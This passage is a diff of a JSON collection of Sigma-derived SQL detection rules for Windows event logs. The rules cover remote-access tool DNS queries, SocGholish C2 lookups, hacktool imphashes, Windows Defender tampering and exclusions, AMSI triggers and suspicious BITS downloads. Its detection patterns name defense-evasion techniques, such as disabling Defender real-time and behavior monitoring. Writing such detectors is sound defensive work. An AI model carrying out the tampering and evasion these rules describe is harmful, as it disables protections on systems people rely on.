software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113, Connor Martin", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of the software mentioned above" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "dns_query_win_remote_access_software_domains.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Suspicious TeamViewer Domain Access", - "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "status": "test", - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Exclusions Added", + "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "status": "stable", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (Image LIKE '%TeamViewer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "dns_query_win_susp_teamviewer.yml" + "filename": "win_defender_exclusions.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + ], + "filename": "win_defender_exploit_guard_tamper.yml" + }, + { + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "AppX Package Installation Attempts Via AppInstaller", - "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "status": "test", - "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", - "author": "frack113", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND Image LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "dns_query_win_lolbin_appinstaller.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Creation Of a Suspicious ADS File Outside a Browser Download", - "id": "573df571-a223-43bc-846e-3f98da481eca", + "title": "BITS Transfer Job Downloading File Potential Suspicious Extension", + "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "status": "experimental", - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.hta' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.psd1' ESCAPE '\\' OR LocalName LIKE '%.sh' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT ((LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_creation_internet_file.yml" + "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", 